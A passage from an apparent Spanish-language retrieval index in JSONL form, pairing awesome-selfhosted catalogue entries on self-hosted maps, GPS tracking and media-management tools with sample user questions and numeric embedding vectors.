-0.0426, -0.01033, 0.05221, 0.02166, 0.02961, 0.07876, 0.044, -0.05031, -0.05916, -0.07871, -0.05303, -0.02092, -0.01349, 0.04784, -0.06316, 0.04676, 0.05599, -0.03142, -0.06872, -0.03893, 0.02244, -0.08715, -0.05898, -0.12297, 0.05559, 0.00622, 0.02758, -0.03467, 0.04144, 0.12912, 0.00802, 0.03536, -0.02314, -0.08651, 0.03914, -0.06272, -0.00074, -0.05022, -0.05602, 0.08343, -0.00198, -0.00073, 0.01933, 0.05529, -0.02765, -0.01779, 0.06721, 0.04368, -0.05923, 0.02144, -0.06624, -0.04045, -0.01931, 0.01117, 0.03459, -0.06843, -0.00919, 0.06082, 0.03148, -0.00935, -0.00063, -0.03389, 0.01799, 0.02311, -0.08717, -0.10926, -0.01163, 0.02738, 0.05011, -0.0096, -0.03328, 0.0083, 0.02592, 0.02934, 0.02977, -0.06077, -0.06893, 0.06799, 0.00116, 0.0247, 0.03948, 0.00596, -0.02183, 0.0866, 0.14511, -0.001, -0.04752, 0.04397, -0.0246, 0.02511, 0.04359, -0.03379, -0.00156, 0.0779, 0.10515, 0.03104, 0.02188, -0.07449, 0.00416, 0.01733, 0.01578, 0.01555, -0.03297, 0.07433, -0.01211, 0.06366, -0.05824, 0.05443, 0.02797, 0.02055, -0.01039, 0.00506, -0.05539, -0.04885, -0.05414, -0.03954, 0.08569, 0.00819, -0.0004, -0.07028, -0.01353, -0.00246, 0.02182, 0.06359, -0.01193, 0.01273, 0.00308, 0.02638, 0.02443, 0.03535, -0.00599]} -{"tipo": "pregunta", "herramienta": "Maps and Global Positioning System (GPS)", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Maps and Global Positioning System (GPS)", "tema": "maps and global positioning system (gps)", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Maps and Global Positioning System (GPS): Open Source Routing Machine (OSRM) β€” High performance routing engine designed to run on OpenStreetMap data and offering an HTTP API, C++ library interface, and Nodejs wrapper [BSD-2-Clause, C++]. OpenRouteService β€” Route service with directions, isochrones, time-distance matrix, route optimization, etc [GPL-3.0, Docker/Java]. OpenStreetMap β€” Collaborative project to create a free editable map of the world [GPL-2.0, Ruby]. OpenTripPlanner β€” Multimodal trip planning software based on OpenStreetMap data and consuming published GTFS-formatted data to suggest routes using local public transit systems [LGPL-3.0, Java/Javascript]. OwnTracks Recorder β€” Store and access data published by [OwnTracks](https://owntracks.org/) location tracking apps [⚠, GPL-2.0, C/Lua/deb/Docker]. TileServer GL β€” Vector and raster maps with GL styles. Server side rendering by Mapbox GL Native. Map tile server for Mapbox GL JS, Android, iOS, Leaflet, OpenLayers, GIS via WMTS, etc [BSD-2-Clause, Nodejs/Docker].", "indexar": "con que puedo montar un servidor de mapas vectoriales sin usar datos de pago?", "v": [0.03896, 0.01076, -0.21364, -0.16278, -0.15242, -0.03845, 0.12555, -0.1114, -0.13544, -0.05403, -0.14066, -0.12465, 0.05359, -0.04329, -0.02763, 0.12879, 0.1478, -0.09037, 0.08089, -0.03022, 0.04682, -0.05287, 0.00621, -0.09646, -0.13738, 0.19964, 0.04655, -0.10327, -0.17082, 0.0333, 0.0351, 0.01486, -0.05524, -0.05152, -0.07814, -0.06756, -0.01366, 0.03503, -0.02027, -0.04935, 0.05069, 0.00468, -0.05111, 0.00091, -0.02912, -0.01137, 0.01046, -0.03901, 0.03185, -0.05668, -0.01205, -0.00318, -0.16192, 0.00256, -0.10376, -0.03323, 0.13197, -0.0714, 0.1196, -0.01217, -0.0731, 0.09541, -0.04912, 0.0487, 0.02205, -0.00686, 0.0233, 0.03376, -0.09081, -0.00739, -0.03419, 0.05501, 0.01458, -0.0132, 0.06076, 0.02937, 0.04561, -0.05325, 0.02801, 0.14134, -0.03113, -0.0403, -0.12307, 0.12084, -0.08516, 0.00612, 0.03997, -0.06863, 0.08491, -0.0034, 0.06084, 0.15384, -0.00793, 0.02744, 0.00985, -0.02875, 0.05223, -0.01405, -0.01655, 0.01014, 0.02025, 0.0554, -0.02947, 0.11449, 0.07476, 0.06154, 0.11674, -0.0083, 0.04228, -0.06495, 0.05903, 0.01236, -0.12594, 0.00257, -0.06486, -0.10653, -0.00871, 0.0834, 0.01603, 0.05604, -0.01955, 0.01027, 0.09144, 0.04767, 0.03743, -0.03882, 0.03724, 0.07467, -0.0199, 0.03022, -0.02702, -0.02958, -0.06113, -0.05062, 0.00994, 0.05034, -0.01336, -0.01855, 0.01412, -0.02062, 0.04896, 0.03237, -0.04914, -0.02552, 0.08617, 0.01107, 0.04106, -0.07992, -0.10239, -0.03071, 0.0519, 0.0469, 0.02814, 0.04127, -0.09433, -0.03786, 0.07563, -0.05892, -0.05562, 0.0403, 0.03767, 0.04047, -0.01283, 0.10937, 0.02257, -0.08147, 0.01735, 0.01912, 0.04957, 0.05144, -0.00322, 0.07048, 0.02893, -0.07192, 0.05385, -0.05485, -0.07766, -0.07328, -0.00577, 0.02418, -0.00125, -0.02415, -0.01886, -0.00204, -0.07473, 0.01653, 0.03742, -0.00326, 0.00444, 0.01184, 0.0064, 0.11941, 0.01396, 0.04072, 0.06924, -0.09622, -0.01124, 0.03841, -0.0298, -0.05469, -0.02342, 0.01774, -0.04855, -0.02935, -0.02652, 0.00116, -0.06075, 0.03968, 0.05878, 0.01719, -0.00213, -0.04764, 0.07196, -0.06706, -0.0007, -0.01611, 0.06414, -0.03407, -0.04404, 0.00895, -0.01666, 0.07354, 0.00087, 0.00072, 0.05407, 0.04561, 0.02845, -0.00901, 0.03359, -0.00828, -0.03197, 0.0456, -0.04409, -0.01576, -0.00253, 0.01581, 0.03862, -0.05252, -0.06728, -0.06203, 0.04296, 0.09489, -0.02817, -0.04812, -0.01128, -0.06212, -0.03037, -0.00195, -0.03972, -0.05478, 0.01625, -0.01173, 0.02315, -0.02421, -0.00605, -0.00182]} -{"tipo": "pregunta", "herramienta": "Maps and Global Positioning System (GPS)", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Maps and Global Positioning System (GPS)", "tema": "maps and global positioning system (gps)", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Maps and Global Positioning System (GPS): Open Source Routing Machine (OSRM) β€” High performance routing engine designed to run on OpenStreetMap data and offering an HTTP API, C++ library interface, and Nodejs wrapper [BSD-2-Clause, C++]. OpenRouteService β€” Route service with directions, isochrones, time-distance matrix, route optimization, etc [GPL-3.0, Docker/Java]. OpenStreetMap β€” Collaborative project to create a free editable map of the world [GPL-2.0, Ruby]. OpenTripPlanner β€” Multimodal trip planning software based on OpenStreetMap data and consuming published GTFS-formatted data to suggest routes using local public transit systems [LGPL-3.0, Java/Javascript]. OwnTracks Recorder β€” Store and access data published by [OwnTracks](https://owntracks.org/) location tracking apps [⚠, GPL-2.0, C/Lua/deb/Docker]. TileServer GL β€” Vector and raster maps with GL styles. Server side rendering by Mapbox GL Native. Map tile server for Mapbox GL JS, Android, iOS, Leaflet, OpenLayers, GIS via WMTS, etc [BSD-2-Clause, Nodejs/Docker].", "indexar": "cual es una alternativa libre a Google Maps para generar direcciones?", "v": [-0.01055, 0.05265, -0.00453, -0.11236, -0.0951, -0.05752, 0.04932, 0.00112, -0.0932, -0.05942, -0.09532, -0.15886, -0.05483, -0.00247, 0.12133, 0.03309, 0.12444, -0.10259, 0.09357, -0.03536, -0.11712, 0.05676, -0.0484, -0.16532, -0.0932, -0.02363, -0.0068, -0.09982, -0.07855, 0.05478, -0.00218, -0.05453, -0.11356, -0.04269, -0.19583, -0.03002, 0.12796, 0.03164, 0.02703, -0.08499, -0.02257, -0.04653, -0.16681, 0.14267, -0.1198, -0.08894, 0.00045, 0.01311, -0.04982, -0.08255, -0.09407, -0.00152, -0.17997, 0.0232, 0.05951, 0.06019, 0.13819, -0.14369, -0.10041, -0.01524, -0.09285, -0.0298, 0.0258, 0.08934, 0.03587, 0.00755, 0.04291, 0.08868, -0.12833, 0.03656, -0.01242, 0.04128, 0.0558, 0.00763, 0.02447, 0.09317, -0.02457, -0.00085, -0.04787, 0.11525, 0.10781, -0.06755, -0.11956, 0.03, -0.04929, -0.05929, 0.03145, -0.12525, -0.01724, -0.06888, -0.00038, 0.08402, -0.07176, 0.16049, 0.01616, -0.00913, 0.04877, 0.01673, -0.03196, 0.07369, 0.06974, 0.00122, -0.0983, -0.01228, 0.02116, 0.04477, 0.01613, 0.04972, -0.06567, 0.03576, 0.00798, 0.01887, 0.01732, 0.02932, 0.0512, -0.0439, -0.01408, 0.08393, -0.01215, -0.03366, -0.07116, -0.02564, -0.07089, -0.04909, -0.02451, 0.12263, -0.03067, 0.03773, -0.00104, 0.0189, 0.05335, -0.03757, -0.02463, -0.08837, -0.07718, 0.11025, 0.07392, -0.03436, 0.0367, 0.03764, 0.00625, -0.007, 0.05466, -0.12648, -0.04213, 0.00923, 0.01497, -0.04965, -0.09838, -0.04054, -0.09054, 0.0334, -0.00967, 0.10991, 0.03988, 0.04084, -0.12306, -0.05138, -0.07111, 0.02563, 0.04299, -0.02893, -0.00796, 0.0555, 0.00493, -0.01187, -0.01183, 0.02349, 0.00244, 0.02338, -0.02649, 0.07965, 0.04231, -0.10701, 0.05542, -0.0552, 0.0038, -0.05511, 0.03853, 0.02646, 0.04018, -0.00602, -0.0154, 0.03324, -0.06643, -0.03805, 0.00196, -0.01739, 0.02778, 0.04622, -0.06136, 0.03731, -0.03041, -0.01244, 0.02232, -0.06242, 0.027, -0.08031, -0.06424, 0.00103, -0.05546, -0.04162, -0.03415, 0.02131, -0.03791, -0.00894, 0.02525, 0.06455, 0.00245, 0.00524, -0.02424, -0.07608, 0.01552, -0.01186, -0.06855, -0.00868, -0.00038, -0.04306, 0.02815, -0.02792, 0.01497, 0.00264, -0.01762, -0.00713, 0.00759, 0.05776, 0.03072, -0.00457, -0.00837, -0.04208, 0.07012, -0.01723, -0.01977, 0.02443, 0.0435, -0.00075, 0.0192, 0.02582, 0.01945, -0.05148, 0.05265, 0.04309, -0.05079, 0.0039, -0.05462, -0.01677, -0.05256, -0.02288, -0.04246, -0.04479, -0.05563, 0.04662, 0.05957, 0.03864, 0.04043, -0.03649]} -{"tipo": "pregunta", "herramienta": "Maps and Global Positioning System (GPS)", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Maps and Global Positioning System (GPS)", "tema": "maps and global positioning system (gps)", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Maps and Global Positioning System (GPS): Traccar β€” Java application to track GPS positions. Supports loads of tracking devices and protocols, has an Android and iOS App. Has a web interface to view your trips [Apache-2.0, Java]. TRIP β€” Minimalist POI Map tracker and Trip planner [MIT, Docker]. wanderer β€” Trail database where you can upload your recorded tracks or create new ones and add various metadata to build an easily searchable catalogue [AGPL-3.0, Docker/Go/Nodejs].", "indexar": "que programa sirve para rastrear la posiciΓ³n GPS de mis dispositivos?", "v": [0.11249, 0.01609, -0.12636, -0.26335, 0.10908, -0.13465, -0.0031, -0.10023, -0.00355, -0.00319, 0.05745, -0.04599, -0.06591, 0.04948, 0.16703, -0.01975, 0.03129, 0.00836, -0.0498, 0.01868, -0.10587, -0.02787, 0.05216, -0.06836, -0.02401, 0.12634, 0.0516, -0.09548, -0.22943, -0.03407, -0.00124, -0.00849, -0.09269, -0.10486, -0.17122, -0.1197, 0.01992, -0.01329, -0.07555, -0.01323, -0.00415, -0.07521, 0.02413, 0.01394, 0.00872, -0.08248, 0.09293, -0.04585, -0.01606, 0.0338, -0.05984, 0.12867, -0.03346, 0.00658, -0.00303, -0.05264, 0.10919, -0.07156, -0.04836, -0.07161, -0.06824, -0.08826, 0.01073, -0.01075, 0.03314, 0.01257, 0.03589, 0.06713, -0.10123, -0.14609, 0.01653, 0.04918, 0.02876, 0.00688, 0.05044, 0.10024, -0.01148, 0.12161, 0.13553, 0.0221, 0.05948, -0.06142, -0.08724, 0.06367, -0.10383, 0.07166, 0.13652, 0.01993, -0.05688, -0.12711, 0.00437, 0.14577, -0.02932, 0.0876, 0.04171, -0.01151, 0.09947, 0.07269, 0.04526, 0.09429, 0.13189, -0.07157, -0.01508, 0.05403, -0.06258, 0.12265, 0.04621, -0.02528, -0.01089, 0.01215, 0.02541, -0.04898, -0.0479, -0.05372, -0.0721, -0.0042, -0.00549, -0.02014, 0.02905, -0.02498, -0.07729, -0.018, -0.01788, -0.00869, 0.10779, 0.04122, -0.10713, 0.02744, 0.05207, 0.05134, 0.09169, -0.0785, 0.04173, 0.01667, -0.06842, 0.03811, 0.00451, 0.0529, -0.01393, -0.00023, 0.05976, 0.03895, 0.00473, -0.04335, 0.00037, 0.01112, 0.11663, -0.00424, -0.02103, 0.02768, -0.02776, 0.03369, -0.01468, 0.00015, 0.01176, 0.00824, 0.01791, -0.06081, -0.06574, 0.02541, -0.03392, -0.01082, -0.05365, -0.01013, 0.02493, -0.05894, -0.00196, 0.02741, 0.12363, 0.01224, -0.06691, 0.06867, 0.04919, -0.09602, -0.01826, -0.00092, 0.02012, 0.02359, 0.07292, -0.01917, -0.04058, 0.0474, 0.08947, 0.02387, 0.02876, 0.02366, -0.02196, -0.02484, -0.00712, -0.01349, 0.01674, 0.01044, 0.02682, -0.02374, -0.01593, -0.06405, -0.01281, -0.00112, 0.02298, -0.01926, -0.05697, -0.06223, 0.02629, 0.04622, 0.01053, 0.04015, 0.01863, 0.04476, 0.06324, 0.05018, -0.04817, -0.05372, 0.04085, 0.01422, -0.11515, -0.05637, 0.02847, 0.04986, 0.02633, 0.00247, 0.00454, 0.0312, 0.03185, 0.03335, -0.02398, -0.03326, 0.03915, 0.03368, 0.00959, -0.06125, 0.04909, -0.05525, -0.0489, -0.01382, 0.04599, 0.01711, 0.03717, -0.00404, 0.01625, -0.06669, -0.03152, 0.05165, 0.03117, -0.04007, -0.04266, -0.00661, -0.03437, 0.00754, 0.01564, -0.03798, -0.03146, 0.07638, 0.09084, -0.01604, 0.03769, 0.04124]} -{"tipo": "pregunta", "herramienta": "Maps and Global Positioning System (GPS)", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Maps and Global Positioning System (GPS)", "tema": "maps and global positioning system (gps)", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Maps and Global Positioning System (GPS): Traccar β€” Java application to track GPS positions. Supports loads of tracking devices and protocols, has an Android and iOS App. Has a web interface to view your trips [Apache-2.0, Java]. TRIP β€” Minimalist POI Map tracker and Trip planner [MIT, Docker]. wanderer β€” Trail database where you can upload your recorded tracks or create new ones and add various metadata to build an easily searchable catalogue [AGPL-3.0, Docker/Go/Nodejs].", "indexar": "cual es una alternativa libre a los mapas de GPS con interfaz web?", "v": [0.07916, 0.03566, -0.02961, -0.08063, -0.02325, -0.04548, -0.02046, -0.0112, -0.13273, 0.01823, 0.03192, -0.10848, -0.09051, 0.1393, 0.11973, 0.05305, 0.13217, -0.00738, 0.0378, -0.03595, -0.11536, 0.03874, -0.06135, -0.15177, -0.09619, -0.05039, -0.01414, -0.08527, -0.15764, -0.04475, -0.01025, -0.05205, -0.05179, -0.03815, -0.18942, -0.06598, 0.12862, 0.07999, 0.07476, -0.17473, 0.02763, -0.08635, -0.03646, 0.0799, 0.01955, -0.15181, -0.02754, -0.02663, -0.00168, 0.00691, -0.12141, -0.0457, -0.10329, -0.0069, 0.0179, -0.04131, 0.21036, -0.10299, -0.05774, -0.05234, -0.11202, 0.03395, -0.02579, 0.01721, 0.04922, -0.05315, -0.07944, 0.07793, -0.02973, 0.02389, 0.10786, 0.08015, 0.04822, -0.00759, -0.00296, 0.05681, -0.06063, 0.045, 0.10684, 0.10276, 0.12777, -0.08793, -0.10021, 0.04474, -0.11127, 0.00933, 0.10446, -0.0622, -0.04574, -0.08034, 0.05078, 0.1455, -0.04487, 0.07359, -0.00097, -0.13044, 0.02303, 0.12105, 0.03171, 0.05143, 0.04216, -0.00293, -0.08446, 0.02872, 0.00222, 0.01293, 0.04655, 0.04611, -0.10688, 0.07013, 0.08003, 0.09204, 0.00156, -0.0075, -0.00274, -0.04793, 0.00013, 0.04465, 0.01883, -0.06878, -0.06242, -0.00659, -0.06418, -0.03008, 0.02396, 0.08527, -0.05499, 0.02026, 0.02827, 0.01436, 0.07701, -0.06833, -0.06113, -0.10506, -0.08661, 0.05166, -0.0344, 0.04726, 0.03853, 0.02989, -0.0112, 0.01329, 0.03443, -0.03189, -0.02101, 0.01693, 0.03947, -0.05557, -0.08053, 0.01075, -0.06411, 0.03709, -0.01274, 0.09492, 0.02114, -0.00799, -0.02904, -0.03092, -0.09294, 0.03429, 0.02203, 0.02732, -0.02689, 0.07815, 0.04213, -0.05538, -0.06944, 0.00577, 0.01874, -0.01678, -0.02464, 0.08784, 0.10123, -0.10189, 0.01707, -0.03675, -0.05399, -0.04327, 0.03383, -0.0282, 0.02518, 0.00456, 0.01452, 0.04268, -0.05532, -0.00603, -0.026, 0.00359, -0.03461, -0.0573, -0.00748, 0.105, -0.00134, -0.01728, 0.02877, -0.02511, 0.01789, -0.02975, -0.05451, -0.04924, -0.04027, -0.09051, 0.032, -0.05875, -0.02664, 0.0505, 0.02228, 0.07599, 0.03451, 0.04993, -0.02621, -0.04825, 0.052, 0.01796, -0.06034, -0.01386, 0.05671, 0.00282, 0.03295, -0.05949, 0.02302, 0.05443, 0.0087, -0.00791, 0.00043, -0.00417, 0.04017, 0.03972, 0.01279, -0.03299, 0.04703, -0.03933, -0.01607, 0.01867, 0.02731, 0.01268, 0.05634, -0.00305, -0.01211, -0.0655, 0.01711, 0.05267, -0.00389, -0.00766, -0.04113, -0.03297, -0.03681, -0.0181, 0.00168, -0.07337, -0.06017, 0.03314, 0.05746, 0.04447, 0.02671, 0.04582]} -{"tipo": "pregunta", "herramienta": "Maps and Global Positioning System (GPS)", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Maps and Global Positioning System (GPS)", "tema": "maps and global positioning system (gps)", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Maps and Global Positioning System (GPS): Traccar β€” Java application to track GPS positions. Supports loads of tracking devices and protocols, has an Android and iOS App. Has a web interface to view your trips [Apache-2.0, Java]. TRIP β€” Minimalist POI Map tracker and Trip planner [MIT, Docker]. wanderer β€” Trail database where you can upload your recorded tracks or create new ones and add various metadata to build an easily searchable catalogue [AGPL-3.0, Docker/Go/Nodejs].", "indexar": "con que puedo montar un sistema simple para registrar y organizar mis rutas de senderismo?", "v": [0.1242, 0.12181, -0.21945, -0.22801, -0.06738, -0.02629, -0.04176, 0.02973, -0.15976, -0.12043, -0.09226, -0.06754, 0.18579, -0.09624, 0.17685, 0.07232, 0.02693, 0.01845, -0.01598, 0.03636, -0.07553, -0.07504, 0.08384, 0.07517, -0.03155, -0.00632, 0.13152, -0.1218, -0.08462, 0.01728, -0.02896, 0.14823, 0.02761, -0.0611, -0.03493, -0.10245, 0.04033, 0.00943, -0.07545, -0.10088, -0.06897, 0.0215, -0.02224, 0.11178, -0.03247, -0.04843, 0.01567, -0.12768, -0.00704, -0.07109, 0.03747, -0.06608, -0.08661, -0.02816, 0.01754, -0.02336, 0.0267, -0.07309, 0.04289, -0.09696, 0.03094, 0.09103, -0.01942, 0.0982, 0.09393, 0.00884, -0.00585, -0.07035, -0.06066, -0.05715, 0.04242, -0.05093, 0.0393, -0.02181, 0.00457, 0.06514, 0.058, -0.00456, 0.06227, 0.14949, 0.00866, -0.02781, -0.07096, 0.07554, -0.03898, -0.05506, 0.01339, -0.04559, 0.03286, -0.01518, 0.04176, 0.01402, 0.06211, -0.02496, 0.05924, -0.0466, 0.10154, 0.08022, -0.0118, 0.01228, -0.1232, 0.00764, -0.0568, 0.15707, -0.10019, -0.06973, 0.04455, 0.03137, 0.03348, -0.04899, 0.0007, 0.03915, -0.09298, -0.03336, -0.06321, -0.04886, 0.02236, 0.01037, -0.00647, 0.01583, -0.00956, 0.03927, -0.02401, -0.04453, 0.06149, 0.00936, -0.00621, 0.15067, 0.05466, 0.02947, 0.07467, -0.03976, -0.08217, -0.03677, -0.00574, 0.0377, -0.08243, 0.0089, 0.05541, -0.02675, -0.00763, 0.05091, -0.14341, -0.14381, 0.05622, 0.00876, 0.05874, -0.10675, -0.0378, 0.0062, -0.00661, 0.04253, 0.01003, 0.02318, 0.01192, 0.03488, 0.04121, -0.06221, 0.00193, 0.02458, -0.0227, 0.06603, -0.01596, -0.03392, 0.04298, -0.06412, -0.01077, -0.04444, 0.04286, -0.04672, -0.02287, 0.10075, 0.09016, -0.04802, 0.05318, -0.02403, -0.07322, -0.06374, 0.0779, 0.06777, -0.02837, 0.06765, 0.05969, 0.01463, -0.02996, 0.02774, 0.02603, 0.0226, 0.00561, 0.02874, 0.04178, 0.02357, 0.02291, -0.00502, 0.04333, -0.04127, -0.01494, -0.00897, -0.00416, 0.01039, -0.03908, -0.04341, 0.00696, -0.04566, 0.00394, -0.01256, -0.04782, 0.08771, 0.09761, 0.05007, 0.04238, -0.03887, 0.01559, -0.05934, -0.07832, 0.02863, -0.02684, -0.01604, -0.02309, -0.00746, 0.02356, 0.06539, 0.02595, 0.00807, 0.03617, -0.027, -0.00068, -0.00854, -0.0085, 0.01608, -0.01404, -0.02914, -0.00711, 0.00534, 0.01693, -0.02152, 0.0247, -0.04064, -0.04022, 0.01396, 0.00328, 0.07112, 0.0232, -0.02754, -0.10698, -0.04411, -0.02124, 0.08, -0.01132, -0.08951, 0.0042, 0.02481, 0.03348, -0.01823, -0.03067, -0.05833]} -{"tipo": "pregunta", "herramienta": "Media Management", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Media Management", "tema": "media management", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Media Management: ChannelTube β€” Download video or audio from YouTube channels on a schedule via yt-dlp [⚠, AGPL-3.0, Docker]. Deleterr β€” Automated media cleanup tool that removes watched and stale content from Plex, Sonarr, and Radarr based on configurable rules [MIT, Docker]. Downtify β€” Download Spotify music with album art and metadata [⚠, GPL-3.0, Docker]. Lidarr β€” Music collection manager for Usenet and BitTorrent users [GPL-3.0, C#/Docker]. LidaTube β€” Finding and fetch missing Lidarr albums via yt-dlp [⚠, GPL-3.0, Docker]. Lidify β€” Music discovery tool that provides recommendations based on selected Lidarr artists, using Spotify or LastFM [⚠, MIT, Docker]. Medusa β€” Automatic Video library manager for TV Shows. It watches for new episodes of your favorite shows, and when they are posted it does its magic [GPL-3.0, Python]. MeTube β€” Web GUI for youtube-dl, with playlist support. Allows downloading videos from dozens of websites [AGPL-3.0, Python/Nodejs/Docker].", "indexar": "quΓ© programa me permite descargar vΓ­deos de YouTube en funciΓ³n del horario?", "v": [-0.08681, 0.09358, -0.05442, -0.20228, -0.05231, 0.00897, -0.02048, 0.00035, 0.13415, -0.16407, -0.07621, -0.14257, 0.01907, -0.03772, -0.071, -0.01531, 0.15757, -0.10675, 0.13725, 0.00703, 0.06734, 0.00673, -0.07638, -0.07795, -0.04178, -0.00382, -0.01934, 0.00265, -0.03889, -0.09504, 0.03353, 0.02773, 0.01083, -0.04499, -0.02368, 0.05164, 0.10316, 0.0158, -0.03132, -0.03212, 0.01162, 0.0252, -0.07797, 0.06183, 0.03471, -0.02703, 0.11369, -0.05615, -0.09689, -0.07829, 0.13606, 0.02711, 0.03478, 0.04321, -0.03386, -0.09252, 0.03081, -0.15244, -0.08921, -0.05485, 0.10842, -0.08095, 0.05876, 0.00713, 0.05885, 0.05228, 0.08611, 0.14498, -0.01244, 0.03852, -0.11001, -0.06979, 0.00716, 0.06415, 0.0409, 0.06109, -0.08051, -0.03915, -0.0992, -0.01871, 0.00756, -0.0356, 0.04732, 0.03146, -0.03653, -0.02193, 0.04241, -0.00474, -0.06178, -0.1808, 0.00274, 0.16204, 0.09368, 0.04026, -0.00702, -0.03866, 0.05295, -0.02302, 0.02519, -0.03857, 0.04068, -0.04506, -0.06438, 0.12556, 0.04889, 0.14698, -0.0038, -0.08136, -0.06715, 0.03834, 0.04424, 0.04947, -0.07778, -0.05968, -0.01078, 0.08372, -0.06137, -0.01673, 0.00171, -0.02271, 0.0234, 0.0772, -0.06995, -0.05929, 0.06835, 0.01654, 0.05268, 0.07216, 0.00461, 0.07673, 0.00238, -0.06398, -0.01107, -0.02644, 0.015, -0.07432, 0.08508, 0.0119, -0.13036, -0.08856, 0.09802, -0.02004, 0.04996, -0.02192, 0.06971, -0.0492, 0.04893, -0.13677, -0.07039, 0.02907, 0.01456, 0.02862, -0.07476, -0.06587, 0.00614, -0.00989, -0.01782, -0.10323, -0.11512, -0.02349, 0.09699, -0.05246, -0.01772, -0.09776, 0.02021, -0.00376, -0.04255, 0.05003, 0.00776, 0.0683, 0.02258, 0.06499, 0.01486, -0.07845, -0.05194, -0.03586, 0.02125, -0.02577, 0.10008, 0.02665, -0.10329, 0.07196, 0.0874, 0.03255, -0.06137, -0.07425, -0.0909, 0.04015, -0.08485, 0.02401, -0.03403, -0.02786, -0.03038, -0.00117, 0.01818, -0.00333, -0.08493, -0.04567, -0.01137, -0.00639, -0.03733, -0.05885, 0.01254, 0.00403, -0.04044, 0.02346, 0.00123, 0.00876, 0.00324, 0.03178, 0.00329, 0.00302, -0.00711, -0.00746, 0.02515, -0.0174, 0.07554, 0.02886, 0.08385, -0.01191, -0.00383, -0.01093, 0.02858, 0.00693, -0.03813, -0.00067, 0.07877, 0.05056, -0.00713, 0.02029, -0.02191, -0.04291, -0.06234, -0.08309, 0.07242, -0.00657, -0.03723, 0.00749, 0.00023, -0.01037, -0.03424, 0.10122, 0.01288, 0.01116, -0.04587, -0.01956, -0.04335, 0.01345, 0.04648, -0.06827, -0.0418, 0.04097, 0.00199, -0.0338, -0.00898, 0.02924]} -{"tipo": "pregunta", "herramienta": "Media Management", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Media Management", "tema": "media management", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Media Management: ChannelTube β€” Download video or audio from YouTube channels on a schedule via yt-dlp [⚠, AGPL-3.0, Docker]. Deleterr β€” Automated media cleanup tool that removes watched and stale content from Plex, Sonarr, and Radarr based on configurable rules [MIT, Docker]. Downtify β€” Download Spotify music with album art and metadata [⚠, GPL-3.0, Docker]. Lidarr β€” Music collection manager for Usenet and BitTorrent users [GPL-3.0, C#/Docker]. LidaTube β€” Finding and fetch missing Lidarr albums via yt-dlp [⚠, GPL-3.0, Docker]. Lidify β€” Music discovery tool that provides recommendations based on selected Lidarr artists, using Spotify or LastFM [⚠, MIT, Docker]. Medusa β€” Automatic Video library manager for TV Shows. It watches for new episodes of your favorite shows, and when they are posted it does its magic [GPL-3.0, Python]. MeTube β€” Web GUI for youtube-dl, with playlist support. Allows downloading videos from dozens of websites [AGPL-3.0, Python/Nodejs/Docker].", "indexar": "con quΓ© puedo limpiar automΓ‘ticamente los contenidos ya vistos o antiguos en mi biblioteca multimedia?", "v": [0.17264, 0.11457, -0.14122, -0.00167, 0.01569, -0.06421, -0.14701, -0.02687, -0.13413, -0.24045, 0.00546, -0.1322, 0.06961, 0.03563, 0.08286, -0.0199, 0.11892, -0.15207, 0.0327, 0.0213, 0.11828, -0.03034, -0.11167, 0.02384, -0.01762, -0.06846, 0.12126, 0.06524, -0.12166, 0.13449, -0.02029, 0.10794, 0.05101, 0.03935, -0.07906, -0.02875, 0.03465, 0.02426, -0.13043, -0.07614, 0.02032, 0.09244, 0.05041, 0.06432, -0.02113, -0.074, 0.08522, 0.03255, -0.06693, 0.02102, -0.00312, -0.02482, -0.06037, -0.02564, 0.00783, -0.06597, 0.09649, 0.01645, 0.04648, -0.03492, -0.0207, 0.07442, 0.01702, 0.04281, 0.04671, 0.01254, 0.06255, 0.06243, 0.01397, 0.11903, -0.06177, -0.00085, 0.12114, -0.00355, -0.11276, 0.01352, -0.07335, -0.0683, 0.09009, 0.0727, 0.01385, -0.07761, 0.02996, -0.03291, -0.0805, -0.06691, -0.06034, -0.05966, -0.01602, -0.04591, -0.03837, 0.01205, -0.02086, 0.01203, 0.01322, -0.02607, 0.08637, -0.00767, 0.00423, 0.10443, -0.02378, -0.00162, -0.04428, 0.05062, 0.00077, -0.08369, -0.05753, -0.07317, -0.01531, -0.11636, 0.06728, 0.00456, -0.02204, -0.09525, -0.10677, 0.06706, 0.03115, -0.01524, 0.03186, 0.03962, -0.09831, -0.02579, -0.01608, 0.03466, 0.09489, 0.0098, 0.13305, 0.02958, -0.01306, 0.01399, 0.02965, -0.00757, -0.0416, -0.03648, -0.07161, -0.0504, -0.03632, -0.11657, -0.04984, -0.02082, 0.05815, 0.04528, -0.04534, 0.04819, 0.0628, -0.12286, 0.12308, -0.03811, -0.04237, -0.02394, -0.05585, -0.04988, 0.04969, 0.03075, 0.03118, 0.12493, 0.04658, -0.06176, -0.05115, -0.03785, -0.03859, -0.07403, 0.00995, -0.00457, -0.07707, 0.007, -0.04948, -0.04417, 0.04106, -0.02468, -0.06322, 0.00458, -0.04868, -0.07182, -0.09159, 1e-05, -0.00833, 0.01034, 0.08283, 0.04321, -0.06903, -0.03853, -0.01959, -0.03409, -0.09276, -0.12737, -0.00303, -0.08169, -0.01099, -0.04919, -0.01875, 0.01821, -0.01583, -0.04617, 0.06946, -0.05507, -0.07987, 0.01396, -0.01061, 0.01742, -0.00747, 0.01331, 0.06295, 0.06367, 0.00702, -0.00517, -0.00483, 0.04362, 0.00786, 0.00824, 0.05815, 